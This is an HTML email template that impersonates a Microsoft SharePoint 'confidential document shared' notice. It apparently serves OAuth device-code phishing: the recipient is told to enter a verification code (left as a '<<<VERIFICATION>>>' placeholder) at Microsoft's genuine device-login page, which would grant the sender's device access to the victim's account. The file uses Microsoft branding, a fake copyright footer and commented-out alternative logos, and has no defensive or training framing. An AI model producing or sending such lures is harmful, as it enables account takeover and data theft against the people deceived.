<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document Shared Notice</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f4f4f4;
        }
        .container {
            max-width: 600px;
            margin: 20px auto;
            padding: 20px;
            background-color: white;
            border: 1px solid #ddd;
            box-shadow: 0 2px 4px rgba(0,0,0,.1);
        }
        .header {
            background-color: #0072C6;
            color: white;
            padding: 10px;
            text-align: center;
        }
        h2 {
            color: #005A9E;
        }
        p {
            color: #333;
        }
        .button {
            display: inline-block;
            padding: 10px 20px;
            background-color: #0078d4;
            color: white;
            text-decoration: none;
            border-radius: 5px;
            margin-top: 20px;
        }
        .logo {
            max-width: 100%;
            height: auto;
            display: block;
            margin: 0 auto 20px;
        }
        .footer {
            font-size: 12px;
            text-align: center;
            color: #666;
            margin-top: 20px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <!-- <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e1/Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg/512px-Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png" alt="Logo" class="logo">
             -->
             <!-- <img src="https://www.fast2.tech/images/connectors/sharepoint-logo.webp" alt="Logo" class="logo">
             -->
             <img src="https://cas.okstate.edu/site-files/sharepoint.jpg" alt="Logo" class="logo">                        
        </div>
        <h2>Confidential Document Shared</h2>
        <p>A SharePoint user has shared a confidential document with you. Please handle this information with care.</p>
        <p>Please enter this verification code when requested: <strong><<<VERIFICATION>>></strong></p>
        <a href="https://login.microsoftonline.com/common/oauth2/deviceauth" class="button">View Document</a>
        <p>If you believe you have received this notice in error, please contact your system administrator.</p>
        <div class="footer">
            © 2024 Microsoft Corporation. All rights reserved.
        </div>
    </div>
</body>
</html>
